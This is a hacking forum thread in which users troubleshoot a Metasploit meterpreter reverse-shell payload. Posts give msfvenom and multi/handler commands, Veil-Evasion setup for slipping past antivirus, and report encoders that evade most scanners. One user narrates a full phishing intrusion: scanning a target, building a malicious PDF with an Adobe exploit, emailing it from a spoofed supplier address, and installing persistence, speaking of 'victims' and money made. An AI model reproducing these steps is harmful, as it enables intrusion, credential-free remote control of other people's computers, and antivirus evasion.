Jump to content

Meterpreter shell not working?


isaac_204

Recommended Posts

Hey guys I have a problem that is bothering me for a long time now.I can't execute a meterpreter shell that I created in Kali Linux I click it and nothing happens.The code I used at the start was (msfvenom -p windows/meterpreter/reverse_tcp LHOST=my ip LPORT=445..etc and when I launched it on my laptop (windows 8.1) nothing happened it didn't open or anything and it didn't connect to my PC(Kali Linux).Another code that I have used is (msfvenom  -a x64 -p windows/meterpreter/reverse_tcp -e x64/xor  -i 30 -f exe LHOST....etc but that code doesn't work too.For both of the payloads I've used :

 
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST...
set LPORT...
exploit
 
If you guys know what the problems is please reply because I don't seem to find it.Thank you in advance.
Link to comment
Share on other sites

do you have metasploit-framwork configured correctly  ?  try cd   /opt/metasploit-framework    then do a bundle install   

what version of ruby are you running     ................

also try    exploit  -j   when you execute 

make sure system is fully up to date   update  upgrade  dist-upgrade  autoremove autoclean   apt-get clean   ect .

also  open iceweasel   or firefox  and paste this       http://ping.eu/port-chk/  

make sure that you router is port forwaded properly    and are you behind  a firewall?

im sure you have already checked most of the common stuff yourself

ive only been at this for about 2 years and still learning everyday  im still a noob lol

but if none of that stuff helps you i am sorry just sit tight and someone more experienced  comes along sorry if i couldnt help

every one is always helping me i thought i would try lol  cheers :)

 

Link to comment
Share on other sites

oh  and try veil-framework      https://github.com/Veil-Framework/Veil-Evasion    

either git clone  to download it to you root dir   or  download the zip and extract it   then cd  into the veil-Evasion   frame work folder that you just downloaded

the cd into setup  then run     ./setup.sh -c         type   y when it ask so on so forth install pycrypto   its all automated you will see

anyways once that is done   cd ..  to the mail Veil-Framework folder  this time cd into the config folder the   ls   because im not sure of the exact name

of the file but i believe its just update.py    so same goes here   ./update.py   then cd..   again  and run the    ./Veil-Evaision.py  

then type list  it should show 51 payloads     choose your  reve_tcp    then   set LHOST    &  set LPORT     &  generate then you are done

try that instead of  msfvenom or msfpayload   veil is awsome others may disagree   thats my opinion try it then decide for yourself

Link to comment
Share on other sites

Just now, datajumper said:

oh  and try veil-framework      https://github.com/Veil-Framework/Veil-Evasion    

either git clone  to download it to you root dir   or  download the zip and extract it   then cd  into the veil-Evasion   frame work folder that you just downloaded

the cd into setup  then run     ./setup.sh -c         type   y when it ask so on so forth install pycrypto   its all automated you will see

anyways once that is done   cd ..  to the mail Veil-Framework folder  this time cd into the config folder the   ls   because im not sure of the exact name

of the file but i believe its just update.py    so same goes here   ./update.py   then cd..   again  and run the    ./Veil-Evaision.py  

then type list  it should show 51 payloads     choose your  reve_tcp    then   set LHOST    &  set LPORT     &  generate then you are done

try that instead of  msfvenom or msfpayload   veil is awsome others may disagree   thats my opinion try it then decide for yourself

the payload will be saved   under usr/share/veil-output/compiled

Link to comment
Share on other sites

what is the syntax that is not working for you   ...   when you say  you cant get a shell  are you talking about msfvenom

sometimes for me the encoders throw me for a loop if you want a quickly generated  payload  ive had alot of good luck from Veil

so i am glad i actually helped someone lol  thats usually never the case  im always the one in need of help 

iv you liked veil-frame work try  veil-ordinance    or venom shellcode generator   veil-evasion is still my favorite ive not had it fail yet 

Knock on wood lol   but let me know how it goes or if you need any help im here   cheers!

Link to comment
Share on other sites

hey just out of plain curiosity what methods do you use to deploy your payloads ??  example  :  web_delivery   rubber ducky

physicaly with a usb flash drive  email???     let me know how you get your pwnage on lol  

im just curious you dont hear alot of people telling thier stories about how the run thier exploits    if you want to share thats fine if not thats ok as well

man    cheers  !!

Link to comment
Share on other sites

The first time I hacked someone was my dad because he wanted to check his security.This is how i did it.I visited my dads store and when i left i have taken a card wich had his email adress, his number etc and I cracked his Wifi and took his public ip.So when i got back home I started searching for new products that he might be intrested in so I created a PDF file using this code in msfconsole.

However before i created the payload I did some vulnerbility scanning;

nmap -sS -Pn (his public ip adress) and with this code I got the OS the open tcp ports etc.

msf >use exploit/windows/fileformat/adobe_utilprintf

Then I searched for suppliers.So I made a new email adress and I named with the name of a supplier.

After the creation of the email adrees I named the pdf file;

msf >set FILENAME newproducts.pdf

msf >set PAYLOAD windows/meterpreter/reverse_tcp

msf > LHOST=(My static public ip_

msf >LPORT=(the open tcp port on his computer) of course i had port foward the port

msf >exploit

msf >use exploit/multi/handler

msf >set PAYLOAD windows/meterpreter/reverse_tcp

msf >set LPORT 4444

msf >set LHOST (public ip)

msf >exploit

After I created the payload I used a code to send the email

>sendEmail -t (my dads email) -f UncleJohns@gmail.com -s (a random ip adress) -u New Poducts -a /root/Desktop/NewProducts.pdf

Then I wrote the Email and I hit Enter and Ctrl+D

And then I ran a persistence script.Thats how i got my first bucks.Please tell me your story its fun hearing how pen testers exploit their victims

Link to comment
Share on other sites

hey is this the syntax that you were using ..............    that wasnt working for you ???

 

./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

give me your syntax   and errors if any and i will try to help you

Link to comment
Share on other sites

  • 2 months later...

Ok so I finally got it work....I fucked around a litle bit trying to figure out what was the problem and I finally got it to work I used another payload " windows/x64/meterpreter/_base64 or windows/x64/meterpreter/reverse_tcp" and I used /xor as encoder and shikata_ga_nai they both worked great on most of the antivirus....But ESET is a tough son of a gun....

Link to comment
Share on other sites

Kali does a lot of things well, but I've recently switched over to Parrot Security OS.  Interestingly enough, a lot of the 'fuck with factor' I had in Kali (even in the 2016 release) went away when I started using Parrot.  You may want to give it a try.  https://www.parrotsec.org/. I only suggest it so you can spend more time on the hack and less time getting it to work.  Cheers!

Link to comment
Share on other sites

  • 6 months later...
On 9/28/2016 at 1:46 PM, Wallruss said:

Kali does a lot of things well, but I've recently switched over to Parrot Security OS.  Interestingly enough, a lot of the 'fuck with factor' I had in Kali (even in the 2016 release) went away when I started using Parrot.  You may want to give it a try.  https://www.parrotsec.org/. I only suggest it so you can spend more time on the hack and less time getting it to work.  Cheers!

Hello, I am using parrot OS and i am facing error while running meterpreter scripts, even when i try to execute web_stream command it through me one script again and again .. where as in kali linux its forking fine.. can you please guide me what issue is comming.. is there any kind of compatibilty issue in metasploit with meterpreter scripts.. 

Note: i have update upgraded and dist-upgrade my system. but still i am facing same issue even with other scripts of meterpreter is not working in parrot but in kali they are working fine.. but i dont want to use kali linux so pls help me what should i do to fix this problem in parrot.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...